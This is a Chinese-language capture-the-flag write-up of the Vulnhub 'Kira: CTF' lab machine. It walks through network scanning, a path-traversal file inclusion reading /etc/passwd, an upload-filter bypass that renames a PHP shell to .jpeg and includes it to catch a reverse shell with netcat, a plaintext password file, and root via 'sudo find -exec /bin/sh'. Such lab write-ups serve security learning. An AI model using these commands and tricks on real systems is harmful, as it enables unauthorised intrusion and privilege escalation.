首页 > 其他分享 >Vulnhub之KiraCTF靶机解题过程

Vulnhub之KiraCTF靶机解题过程

时间:2022-11-26 20:22:30浏览次数:40  
标签:26 KiraCTF bassam 2020 usr sbin 靶机 root Vulnhub

KiraCTF

作者: jason_huawen

靶机基本信息

名称:Kira: CTF

地址:

https://www.vulnhub.com/entry/kira-ctf,594/

识别目标主机IP地址

──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.26.75.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                            
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:f8:97:75      2     120  PCS Systemtechnik GmbH                                                   
 192.168.56.223  08:00:27:a6:c7:86      2     120  PCS Systemtechnik GmbH      

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.223

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.223 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 05:55 EST
Nmap scan report for localhost (192.168.56.223)
Host is up (0.000073s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:A6:C7:86 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds

NMAP扫描结果表明目标主机有1个开放端口80(HTTP)

Get Access

访问80端口,发现是个文件上传的页面,用图片测试上传功能,可以正常上传,而且文件上传位置在/uploads目录

然后直接上传shell.php,返回错误信息:File is not image

尝试第一种绕过:用burpsuite截获请求,修改Content-type为image/jpeg,返回同样的错误信息。

尝试第二种绕过:在shell.php头部添加GIF89a; 返回同样的错误信息

另外首页页面含有language链接,访问该链接,似乎有本地文件包含漏洞,确认一下:

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
bassam:x:1000:1000:Bassam,,,:/home/bassam:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
<!DOCTYPE html>
<html>
<head>
        <title>LFI</title>
</head>
<body>
<input type="submit" value="language" 
    onclick="window.location='/language.php?lang=en.php';" />  
</form>
</body>
</html>

目标主机确实存在本地文件包含漏洞,那看一下是否有私钥可以先下载到本地

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=../../../../../../../home/bassam/.ssh/id_rsa
<!DOCTYPE html>
<html>
<head>
        <title>LFI</title>
</head>
<body>
<input type="submit" value="language" 
    onclick="window.location='/language.php?lang=en.php';" />  
</form>
</body>
</html>

既然存在LFI,那看下是否存在远程文件包含漏洞,以便获得shell

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=http://192.168.56.206:8000/test.txt         
<!DOCTYPE html>
<html>
<head>
        <title>LFI</title>
</head>
<body>
<input type="submit" value="language" 
    onclick="window.location='/language.php?lang=en.php';" />  
</form>
</body>
</html>

经过测试,不能实现远程文件包含。

看了一下其他人的解决方法是,需要结合两种漏洞,即文件上传以及本地文件包含漏洞

将shell.php改名称为shell2.php.jpeg,然后用本地文件包含漏洞去读取这个文件

从而拿到shell

http://192.168.56.223/language.php?lang=../../../../../../../var/www/html/uploads/shell2.php.jpeg
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.223] 45524
Linux bassam-aziz 5.3.0-28-generic #30~18.04.1-Ubuntu SMP Fri Jan 17 06:14:09 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 14:55:20 up  1:07,  1 user,  load average: 0.06, 0.05, 0.35
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
bassam   :0       :0               13:47   ?xdm?  23.94s  0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bassam-aziz:/$ ls
ls
bin    dev   initrd.img      lib64       mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib             media       proc  sbin  swapfile  usr
www-data@bassam-aziz:/$ cd /home
cd /home
www-data@bassam-aziz:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K ما� 26  2020 .
drwxr-xr-x 24 root   root   4.0K ما� 26  2020 ..
drwxr-xr-x 16 bassam bassam 4.0K نو� 26 13:48 bassam
www-data@bassam-aziz:/home$ cd bassam
cd bassam
www-data@bassam-aziz:/home/bassam$ ls -alh
ls -alh
total 116K
drwxr-xr-x 16 bassam bassam 4.0K نو� 26 13:48 .
drwxr-xr-x  3 root   root   4.0K ما� 26  2020 ..
-rw-------  1 bassam bassam 1.7K نو� 26 13:47 .ICEauthority
-rw-------  1 bassam bassam    0 نو�  4  2020 .bash_history
-rw-r--r--  1 bassam bassam  220 ما� 26  2020 .bash_logout
-rw-r--r--  1 bassam bassam 3.7K ما� 26  2020 .bashrc
drwx------ 13 bassam bassam 4.0K ما� 26  2020 .cache
drwx------ 11 bassam bassam 4.0K ما� 26  2020 .config
drwx------  3 bassam bassam 4.0K ما� 26  2020 .gnupg
drwx------  3 bassam bassam 4.0K ما� 26  2020 .local
drwx------  5 bassam bassam 4.0K ما� 26  2020 .mozilla
-rw-r--r--  1 bassam bassam  807 ما� 26  2020 .profile
-rw-r--r--  1 root   root     66 ما� 26  2020 .selected_editor
drwx------  2 bassam bassam 4.0K ما� 26  2020 .ssh
-rw-r--r--  1 bassam bassam    0 ما� 26  2020 .sudo_as_admin_successful
-rw-r-----  1 bassam bassam    5 نو� 26 13:47 .vboxclient-clipboard.pid
-rw-r-----  1 bassam bassam    5 نو� 26 13:47 .vboxclient-display.pid
-rw-r-----  1 bassam bassam    5 نو� 26 13:47 .vboxclient-draganddrop.pid
-rw-r-----  1 bassam bassam    5 نو� 26 13:47 .vboxclient-seamless.pid
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Desktop
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Documents
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Downloads
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Music
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Pictures
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Public
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Templates
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Videos
-rw-r--r--  1 bassam bassam 8.8K ما� 26  2020 examples.desktop
-rw-------  1 bassam bassam   32 نو�  4  2020 user.txt
www-data@bassam-aziz:/home/bassam$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@bassam-aziz:/home/bassam$ 

提权

www-data@bassam-aziz:/var/www$ cd html
cd html
www-data@bassam-aziz:/var/www/html$ ls -alh
ls -alh
total 28K
drwxr-xr-x 4 root root 4.0K ما� 26  2020 .
drwxr-xr-x 3 root root 4.0K ما� 26  2020 ..
-rw-r--r-- 1 root root  163 ما� 26  2020 index.html
-rw-r--r-- 1 root root  287 ما� 26  2020 language.php
drwxr-xr-x 2 root root 4.0K نو�  4  2020 supersecret-for-aziz
-rw-r--r-- 1 root root  747 ما� 26  2020 upload.php
drwxrwxrwx 2 root root 4.0K نو� 26 14:48 uploads
www-data@bassam-aziz:/var/www/html$ cd supersecret-for-aziz
cd supersecret-for-aziz
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K نو�  4  2020 .
drwxr-xr-x 4 root root 4.0K ما� 26  2020 ..
-rw-r--r-- 1 root root   15 نو�  4  2020 bassam-pass.txt
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat bassam-pass.txt
cat bassam-pass.txt
Password123!@#
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ su - bassam
su - bassam
Password: Password123!@#

bassam@bassam-aziz:~$ id
id
uid=1000(bassam) gid=1000(bassam) groups=1000(bassam),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
bassam@bassam-aziz:~$ sudo -l
sudo -l
[sudo] password for bassam: Password123!@#

Matching Defaults entries for bassam on bassam-aziz:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bassam may run the following commands on bassam-aziz:
    (ALL : ALL) /usr/bin/find
bassam@bassam-aziz:~$ sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -alh
ls -alh
total 36K
drwx------  4 root root 4.0K نوفمب  4  2020 .
drwxr-xr-x 24 root root 4.0K مارس  26  2020 ..
-rw-r--r--  1 root root 3.1K أبريل  9  2018 .bashrc
drwx------  2 root root 4.0K فبراي  3  2020 .cache
-rw-r--r--  1 root root   43 نوفمب  4  2020 flag.txt
-rw-r--r--  1 root root 1.0K نوفمب  4  2020 .fl.swp
drwxr-xr-x  3 root root 4.0K مارس  26  2020 .local
-rw-r--r--  1 root root  148 أغسطس 17  2015 .profile
-rw-r-----  1 root root    5 نوفمب 26 13:47 .vboxclient-display-svga.pid
# cat flag.txt
cat flag.txt
THM{root-Is_Better-Than_All-of-THEM-31337}
# 

提权成功!

经验教训

  1. 其实这里的文件上传很好绕过,只需要加上扩展名.jpeg即可,但是如果直接访问该文件,会认为是图片,有错误的图片,而不能拿到shell

  2. 结合本地文件包含漏洞,读取图片文件(其实就是shell.php),从而拿到shell

标签:26,KiraCTF,bassam,2020,usr,sbin,靶机,root,Vulnhub
From: https://www.cnblogs.com/jason-huawen/p/16928203.html

相关文章

  • Vulnhub之KB Vuln 2靶机详细解题过程
    KBVuln2作者:jason_huawen靶机基本信息名称:KB-VULN:2地址:https://www.vulnhub.com/entry/kb-vuln-2,562/识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/KB_Vu......
  • Vulnhub之KB-Vuln靶机详细解题过程
    KB-Vuln作者:jason_huawen靶机基本信息名称:KB-VULN:1地址:https://www.vulnhub.com/entry/kb-vuln-1,540/识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/KB_Vuln]......
  • Vulnhub之jangow-01-1靶机解题过程(shell有问题)
    jangow-01-1.0.1识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/jangow]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.155.0/16|ScreenView:......
  • Vulnhub之Insomnia靶机详细解题估计出
    Insomnia作者:jason_huawen靶机基本信息名称:Insomnia:1地址:https://www.vulnhub.com/entry/insomnia-1,644/识别目标主机IP地址......
  • VulnHub靶机渗透实战9-vikings
    ​本次靶机是CTF风格的靶机。靶场地址:Vikings:1~VulnHub 网络呢还是桥接模式。 DescriptionBacktotheTopACTFmachinewithfullofchallengesDowhatis......
  • Vulnhub之Ino靶机详细解题过程
    Ino作者:jason_huawen靶机基本信息名称:INO:1.0.1地址:https://www.vulnhub.com/entry/ino-101,601/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Ino]└─$sudo......
  • Vulnhub之ICMP靶机详细解题过程
    ICMP作者:jason_huawen靶机基本信息名称:ICMP:1地址:https://www.vulnhub.com/entry/icmp-1,633/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub]└─$sudonetdisc......
  • Vulnhub之Hacksudo LPE靶机详细解题过程
    HacksudoLPE作者:Jason_huawen靶机基本信息名称:hacksudo:L.P.E.地址:hacksudo:L.P.E.~VulnHub识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]└─......
  • Vulnhub之Hacksudo Alien靶机解题过程
    HacksudoAlien识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.80.0/16|ScreenV......
  • Vulnhub之Hacksudo 3靶机解题过程
    Hacksudo3识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo3]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.61.0/16|ScreenView:Unique......